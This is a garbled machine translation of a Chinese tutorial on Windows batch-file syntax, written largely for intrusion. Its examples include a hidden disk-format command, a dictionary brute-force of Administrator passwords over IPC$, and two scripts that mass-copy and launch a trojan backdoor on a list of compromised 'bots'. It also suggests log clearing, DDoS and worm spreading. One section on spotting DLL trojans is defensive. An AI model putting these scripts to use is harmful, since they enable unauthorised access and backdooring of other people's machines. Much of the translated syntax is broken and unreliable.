Batch File Syntax

1. Introduction to simple batch processing internal commands
1. Echo command
Enable or disable the request echo function or display messages. If no parameters exist, the echo command displays the current echo
.
Syntax
Echo [{on | off}] [Message]
Sample: @ echo off/ECHO Hello World
In actual application, we will combine this command with the redirection symbol (also known as the pipeline symbol) to implement
Enter some commands to a file in a specific format. This will be reflected in future examples.

2. @ command
The command after @ is not displayed. During the intrusion process (for example, you can use batch processing to format the enemy's hard disk ),
The other party sees the command you are using.
Sample: @ echo off
@ ECHO now initializing the program, please wait a Minite...
@ Format X:/Q/u/AutoSet (the/y parameter cannot be used for the format command. Fortunately, Microsoft keeps
Given the AutoSet parameter, the effect is the same as that of/Y .)

3. Goto command
Specify to jump to the tag. After finding the tag,ProgramThe command starting from the next line will be processed.
Syntax: goto label (label is a parameter that specifies the rows in the batch processing program to be switched .)
Sample:
If {% 1 }={} goto noparms
If {% 2 }={} goto noparms
.)
@ REM check parameters if null show usage
: Noparms
Echo usage: monitor. Bat serverip portnumber
Goto end
The name of a tag can be used as needed, but it is better to have a meaningful letter. Add a letter before it to indicate that the letter is a mark.
The Goto command is based on this: to find the next step to jump there. It's better to show you what others look like.
To understand your intention.

4. Rem command
The annotation command is equivalent to/* -------- */in the C language. It is not executed, but serves as a annotation for ease of use.
Others read and modify it on your own in the future.
Rem message
Sample: @ REM here is the description.

5. Pause command
When running the pause command, the following message is displayed:
Press any key to continue...
Sample:
@ Echo off
: Begin
Copy A: *. * D: \ back
Echo please put a new disk into driver
Pause
Goto begin
In this example, all files on drive a are copied to drive D: \ back. The displayed comment prompts you to change
When a disk is placed in drive a, the pause command will suspend the program so that you can change the disk and press any key to continue
Processing.

6. Call Command
Call another batch processing program from one batch processing program without terminating the parent batch processing program. Call Command accepted for calling
Use the target tag. If a call is used outside a script or batch file, it does not work in the command line.
Syntax
Call [[drive:] [path] filename [batchparameters] [: Label [arguments]
Parameters
[Drive:} [path] filename
Specifies the location and name of the batch processing program to be called. The filename parameter must have the. bat or. CMD extension.

7. Start command
Call an external program. All the DOS commands and command line programs can be called by the START command.
Common Intrusion parameters:
Minimum window size when Min starts
Separate starts a 16-bit windows program in a separate space
High starts applications in the high priority category
Realtime starts applications in the realtime priority category
Wait starts the application and waits for it to end
Parameters: these are parameters sent to the command/program.
When the executed application is a 32-bit GUI application, cmd. EXE returns a command prompt before the application is terminated. For example
If it is executed in the Command Script, the new behavior will not occur.
8. Choice command
Choice uses this command to allow users to enter a single character to run different commands. The/C: parameter should be added for use,
C: Enter the characters that can be entered. There is no space between them. Its return code is 1234 ......
For example: choice/C: dimethyl defrag, mem, end
Will display
Defrag, mem, end [d, M, E]?
Sample:
The content of sample. bat is as follows:
@ Echo off
Choice/C: dimethyl defrag, mem, end
If errorlevel 3 goto defrag (the highest error code should be determined first)
If errorlevel 2 goto mem
If errotlevel 1 goto end

: Defrag
C: \ dos \ defrag
Goto end
: Mem
Mem
Goto end
: End
Echo good bye

After this file is run, defrag, mem, end [d, M, E]? You can select d m e, and then the if statement will make
Judgment: D indicates the program segment whose execution label is defrag, M indicates the program segment whose execution label is MEM, and E indicates the execution label.
Is the end of the program segment, each segment finally jumps the program to the end label with the Goto end, and then the program will show good
Bye. The file ends.

9. If command

If indicates whether the specified conditions are met, and then different commands are executed. There are three formats:
1. If "parameter" = "string" command to be executed
If the parameter is equal to the specified string, the condition is true. Run the command. Otherwise, run the next sentence. (Note that there are two equal signs)
For example, if "% 1" = "A" format:
If {% 1 }={} goto noparms
If {% 2 }={} goto noparms

2. If exist file name command to be executed
If a specified file exists, the condition is true. Run the command. Otherwise, run the next sentence.
For example, if exist config. sys edit config. sys

3. If errorlevel/if not errorlevel number command to be executed
If the return code is equal to the specified number, the condition is true. Run the command. Otherwise, run the next sentence.
For example, if errorlevel 2 goto X2
When the DOS program runs, a number is returned to DOS, which is called the error code errorlevel or return code.
The codes are 0 and 1.

10. For command
The for command is a complex command. It is mainly used to execute commands cyclically within a specified range of parameters.
When using the for command in a batch file, use % variable to specify the variable

For {% variable | % variable} In (SET) do command [commandlineoptions]
% Variable specifies a single letter replaceable parameter.
(SET) specifies one or more files. Wildcard characters can be used.
Command specifies the Command executed on each file.
Command-parameters specifies a parameter or command line switch for a specific command.
When using the for command in a batch file, use % variable to specify the variable
Instead of % variable. Variable names are case sensitive, so % I is different from % I

If the command extension is enabled, the following additional for command formats are subject
Supported:

For/d % variable in (SET) do command [command-parameters]

If the set contains wildcards, it is specified to match the directory name instead of the file name.
Name match.

For/R [[drive:] path] % variable in (SET) do command [command-

Check the directory tree with [drive:] path as the root and point
For statement. If no directory is specified after/R, the current
Directory. If the set is only a single point (.) character, the directory tree is enumerated.

For/L % variable in (START, step, end) do command [command-Para

This set indicates a sequence of numbers from start to end in incremental form.
Therefore, (, 5) will generate the sequence 1 2 3 4 5, (5,-) will generate
Sequence (5 4 3 2 1 ).

For/f ["options"] % variable in (file-set) do command
For/f ["options"] % variable in ("string") do command
For/f ["options"] % variable in ('command') do command

Or, if usebackq is available:

For/f ["options"] % variable in (file-set) do command
For/f ["options"] % variable in ("string") do command
For/f ["options"] % variable in ('command') do command

Filenameset is one or more file names. Continue to filenameset
Before the next file, each file has been opened, read, and processed.
Processing includes reading files, dividing them into lines of text, and then dividing each line
It is parsed into zero or more symbols. Then use the variable value of the found symbol string
Call the for loop. By default,/F is separated by each row of each file.
. Skip blank lines. You can specify the Optional options"
The parameter replaces the default parsing operation. This quoted string contains one or more
Specify keywords for different resolution options. These keywords are:

EOL = C-refers to the end of a line comment character (just one)
Skip = N-indicates the number of rows ignored at the beginning of the file.
Delims = xxx-refers to the delimiter set. This replaces the space and the hop key.
Default delimiter set.
Tokens = x, y, M-n-indicates which symbol of each row is passed to each iteration.
For itself. This causes
Format is a range. Specify m using the nth symbol
The asterisks of the last character in the symbol string,
Then the extra variables will be parsed In the last symbol
Distribute and accept reserved text of rows.
Usebackq-specify that the new syntax is used in the following situations:
In the format
The quotation mark character is a text string command and allowed in the fi
Use double quotation marks to expand the file name.

Sample1:
For/F "EOL =; tokens = 2, 3 * delims =," % I in (myfile.txt) do command

Analyzes each row in myfile.txt, ignores the rows headers with semicolons
The second and third symbols in each line are passed to the for program body. Use commas and/or
Space separator. Please note that the for program body statement references % I
Get the second symbol, reference % J to get the third symbol, reference % K
To obtain all the remaining symbols after the third symbol. For files with spaces
Name, You need to enclose the file name in double quotes. To make
Use double quotation marks. You also need to use the usebackq option. Otherwise, the double quotation marks will
It is understood that it is used to define a string to be analyzed.

% I is specified in the for statement. % J and % K are
Tokens = the option is specifically described. You can use tokens = a line
A maximum of 26 characters can be specified. If you do not try to figure out a symbol higher than the letter 'Z' or
'Z' variable. Remember that the for variable is a single letter, case sensitive, and global;
At the same time, no more than 52 instances are in use.

You can also use for/F to analyze the logic on adjacent strings. The method is,
Enclose the filenameset between the brackets in single quotes. In this way, the character
Strings are treated as a single input line in a file.

Finally, you can use the for/F command to analyze the command output. The method is
The filenameset between the brackets is converted into an anti-string. This string will
It is passed as a command line to a sub-cmd. EXE, and its output will be captured

Memory, and whenCompositionComponent analysis. Therefore, the following example:

For/F "usebackq delims =" % I in ('set') Do @ echo % I

The names of environment variables in the current environment are enumerated.

In addition, the replacement of the for variable reference has been enhanced. You can now use the following
Option Syntax:

~ I-delete any quotation marks (") and expand % I
% ~ Fi-extend % I to a fully qualified path name
% ~ Di-only expand % I to one drive letter
% ~ Pi-only expand % I to one path
% ~ Ni-only expand % I to one file name
% ~ Xi-only expand % I to one file extension
% ~ The SI-extended path contains only short names.
% ~ Ai-extend % I to file attributes
% ~ Ti-extend % I to the date/time of the file
% ~ Zi-expand % I to the file size
% ~ $ Path: I-find the directory of the environment variable in the path and expand % I
The first fully qualified name found. If the environment variable
Not defined, or the file is not found, this key combination will expand
Null String

You can combine modifiers to get multiple results:

% ~ DPI-only expand % I to one drive letter and Path
% ~ Nxi-only expand % I to one file name and extension
% ~ FSI-only expand % I to a complete path name with a short name
% ~ DP $ path: I-find the directory of the Environment Variable listed in the path and expand % I
To the first drive letter and path.
% ~ Ftzai-extended % I to the Dir similar to the output line

In the preceding example, % I and path can be replaced by other valid values. % ~ Syntax
Terminate with a valid for variable name. Select an uppercase variable name similar to % I
Easy to read and avoid confusion with case-insensitive key combinations.

The above is the official help of Ms. Here are a few examples to illustrate the use of the for command in intrusion.

Sample2:

Use the for command to crack the brute-force password of a target Win2k host.
We use net use \ IP \ IPC $ "password"/u: "Administrator" to try to connect to the target host,
Write down the password when it succeeds.
The main command is: For/f I % in (dict.txt) Do net use \ IP \ IPC $ "I %"
/U: "Administrator"
Use iadminto encrypt the adminpassword, and use the net use command to connect the I % value in dict.txt. Then
Run the result in sequence and pass it to the find command --
For/f I % in (dict.txt) Do net use \ IP \ IPC $ "I %"/u: "Administrator" | find ": Life
"> D: \ OK .txt is successfully completed, so ko is finished.

Sample3:

have you ever had a large number of bots waiting for you to plant backdoors and Trojans ?, When the number is very large, one thing that was originally very happy
will become very depressing :). The Article begins with the use of batch processing files, which can simplify daily or repetitive tasks.
how can this problem be achieved? Well, you will understand it later.

there is only one main command: (when using the for command in the batch file, specify the variable to use % variable)
@ for/F "tokens =, 3 delims = "% I in (victim.txt) do start call door. bat % I % j
% K
for the tokensusage method, see the example sample1. Here, upload the content in victim.txt to
door. % I % J % K in bat.
but cultivate. bat is nothing more than using the net use command to establish an IPC $ connection, and copy the trojan + backdoor to victim,
then use the return code (if errorlever =) to filter hosts that successfully planted backdoors, and echo them out, or echo them to the
specified file.
delims = contents in vivtim.txt are separated by an empty space. I want to see that you must also understand the content in
victim.txt. It should be arranged according to the objects represented by % I % J % K, which is generally IP
password username.
Code prototype:
------------- cut here then save as a batchfile (I call it main. BAT)
-------------------------
@ echo off
@ if "% 1" = "" Goto usage
@ for/F "tokens = 1, 2, 3 delims = "% I in (victim.txt) do start call ipchack. bat % I
% J % K
@ goto end
: usage
@ echo run this batch in DOS modle. or just double-click it.
: End
------------- cut here then save as a batchfile (I call it main. BAT)
---------------------------

----------------- Cut here then save as a batchfile (I call it door. BAT)
-----------------------------
@ Net use \ % 1 \ IPC $ % 3/u: "% 2"
@ If errorlevel 1 goto failed
@ Echo trying to establish the IPC $ connection ............ OK
@ Copy windrv32.exe \ % 1 \ ADMIN $ \ system32 & if not errorlevel 1 echo IP % 1 USER % 2 pwd
% 3> ko.txt
@ Export xec \ % 1 c: \ winnt \ system32 \ windrv32.exe
@ Export xec \ % 1 Net start windrv32 & if not errorlevel 1 echo % 1 backdoored> ko.txt
: Failed
@ Echo sorry can not connected to the victim.
----------------- Cut here then save as a batchfile (I call it door. BAT)
--------------------------------
This is just an example of automatic post-planting door batch processing, two batch processing and post-door program (windrv32.exe.pdf, using xec.exe
Must be placed in a unified directory. Batch Processing content
Still scalable, such as adding the log clearing + DDoS function and adding the user's function at regular intervals.
The automatic propagation function (worm) is available. We will not describe it here. If you are interested, you can study it on your own.

2. How to Use parameters in batch files
Parameters can be used in batch processing, generally from 1% to 9%. When there are multiple parameters, shift is needed.
It is rare, so we will not consider it.
Sample1: fomat. bat
@ Echo off
If "% 1" = "A" format:
: Format
@ Format A:/Q/u/auotset
@ Echo Please insert another disk to driver.
@ Pause
@ Goto fomat
This example is used to consecutively format several floppy disks. Therefore, you must enter fomat. bat a in the DOS window,
It seems a little superfluous ~ Pai_^
Sample2:
When we want to establish an IPC $ connection location, we always need to input a large number of commands. If this is not the case, we will make a mistake.
Some fixed commands are written into a batch, and the IP password username of the BOT farm is assigned to the batch in front of the parameter.
In this way, you don't have to execute commands every time.
@ Echo off
@ Net use \ 1% \ IPC $ "2%"/u: "3%" NOTE: Here password is the second parameter.
@ If errorlevel 1 echo connection failed
How about using parameters? You must have learned ^_^.

3. How to Use compound command)

1 .&

Usage: The First Command and the second command [& the third command...]

This method can be used to execute multiple commands at the same time, regardless of whether the command is successfully executed.

Sample:
C: \> dir Z: & dir c: \ ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume serial number is 0078-59fb

Directory of c: \ ex4rch

<Dir>.
<Dir> ..
14 sometips.gif

2 .&&

Usage: The first command & the second command [& the third command...]

This method can be used to execute multiple commands at the same time. When an error occurs, the subsequent commands are not executed.
If there is no error, all commands are executed;

Sample:
C: \> dir Z: & dir c: \ ex4rch
The system cannot find the path specified.

C: \> dir c: \ ex4rch & dir Z:
Volume in drive C has no label.
Volume serial number is 0078-59fb

Directory of c: \ ex4rch

<Dir>.
<Dir> ..
14 sometips.gif
1 file (s) 14 bytes
2 Dir (s) 768,671,744 bytes free
The system cannot find the path specified.

This command may be relatively simple during backup, for example:
Dir file: // 192.168.0.1/database/backup. mdb & copy
File: // 192.168.0.1/database/backup. mdb E: \ backup
If the backup. MDB file exists on the remote server, run the Copy command. If the file does not exist, do not run the Copy command.
Command. This method can replace if exist :)

3. |

Usage: The First Command | the second command [| the third command...]

This method can be used to execute multiple commands at the same time. When the correct command is executed, the subsequent commands will not be executed.
If there is a correct command, all the commands will be executed;

Sample:
C: \ ex4rch> dir sometips.gif | del sometips.gif
Volume in drive C has no label.
Volume serial number is 0078-59fb

Directory of c: \ ex4rch

14 sometips.gif
1 file (s) 14 bytes
0 Dir (s) 768,696,320 bytes free

Examples of combined commands:
Sample:
@ Copy trojan.exe \ % 1 \ ADMIN $ \ system32 & if not errorlevel 1 echo IP % 1 USER % 2 pass
% 3> victim.txt

Iv. Use of pipeline commands

1. | command
Usage: The First Command | the second command [| the third command...]
Use the result of the first command as a parameter of the second command. Remember that this method is common in UNIX.

Sample:
Time/T> D: \ IP. Log
Netstat-n-p tcp | find ": 3389"> D: \ IP. Log
Start Explorer
See it? The terminal service allows us to customize the starting program for the user to enable the user to run the following
BAT to obtain the IP address of the logon user.

2.>,> output redirection command
Redirects the output result of a command or program to a specific file. The difference between> and> is that> clears
Write the content in the specified file, and >>only append the content to the specified file without modifying the content.

Sample1:
Echo Hello World> C: \ hello.txt (stupid example ?)

Sample2:
DLL Trojans are prevalent nowadays. We know that system32 is a good place to hide and seek. Many Trojans have been pointed to it.
To solve this problem, we can install the system and necessary applications on this directory.
As a record:
Run cmd -- convert the directory to system32 -- dir *. EXE> exeback.txt & dir *. dll> dllback.txt,
In this example, the names of all exeand DLL files are recorded separately to exeback.txtand dllback.txt,
If an exception is found in the future but the problem cannot be found using the traditional method, you should consider whether the system has already penetrated into the DLL Trojan.
In this case, we use the same command to record the exeand dllfiles under system32to another exeback1.txt and
In dllback1.txt, and then run:
CMD -- FC exeback.txt exeback1.txt> diff.txt & FC dllback.txt
Dllback1.txt> diff.txt. (use the FC command to compare the two DLL and exe files before and after, and enter the result
Diff.txt), so that we can find some extra DLL and exe files, and then view the creation time, version
And whether it is compressed, it is easier to determine whether it has been patronized by the DLL Trojan. None is the best,
If any, do not drop del directly. First Use regsvr32/u Trojan. DLL to unregister the backdoor DLL file, and then
It is moved to the recycle bin. if the system does not report any exceptions, it will be completely deleted or submitted to the anti-virus software company.

3. <,> &, <&
<READ command input from the file rather than from the keyboard.
> & Write the output of one handle to the input of another handle.
<& Read the input from one handle and write it into another handle output.
These are not commonly used, so we will not introduce them much.